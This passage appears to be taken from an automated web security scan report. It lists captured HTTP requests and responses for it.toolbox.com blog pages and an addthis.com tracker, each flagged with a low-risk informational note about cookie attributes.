Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000090q01050510982gletz4d0pqa500a0l000400100ag2leqh190wg9g00g0q01050510g82hlebnns181qq00j0q01050510i9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000050q010505105820lebnns181qq00e0l000400100b0olfjpei000000050q010505105ab4lebnns181qq00j0q01050510i9szlebnns181qq00j0q01050510i8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b16g8e00i0q01050510ial1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000050q0105051058bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000050q01050510540slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000060q01050510640uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Location: http://tag.admeld.com/match?admeld_adprovider_id=304&external_user_id=6ch47d7o8wtv&_mydatasegment=foo&expiration=30days
Content-Length: 0
Date: Wed, 26 Jan 2011 14:52:01 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/it.toolbox.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fit.toolbox.com%2Fblogs%2Fppmtoday%2Fventure-and-gender-43847&ref=http%3A%2F%2Fburp%2Fshow%2F4&1yua7sg HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 274
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 26 Jan 2011 14:52:01 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 25 Feb 2011 14:52:01 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296053521.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 25-Jan-2013 14:47:11 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 26 Jan 2011 14:52:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 26 Jan 2011 14:52:01 GMT
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/change-origins-39674 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68764
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Change Orig ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67441
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Does John S ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/dx3-data-driven-decisions-41860 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73174
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Dx3: Data D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/elementary-school-and-saas-38160 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70278
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Elementary ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/it-starts-with-data-40018 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72957
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> It Starts W ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72699
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Key Success ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/life-cycles-40815 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68279
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Life Cycles ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/making-the-case-43129 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73965
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:25 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Making The ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/micracle-free-37832 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66943
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Micracle Fr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/plowing-sideways-43376 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67827
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:24 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Plowing Sid ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/roadmap-process-38207 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Roadmap Pro ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/saas-marches-on-38509 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66827
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SaaS marche ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/talent-curves-40195 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85703
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Talent Curv ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/technical-debt-revisiited-38720 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75502
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Technical D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69302
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Check B ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-emergent-comedy-39924 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68773
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Emergen ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69404
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Wocket ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/two-old-pals-41071 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68626
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Two Old Pal ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/venture-and-gender-43847 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66046
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:24 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Venture and ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/why-should-i-change-40067 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
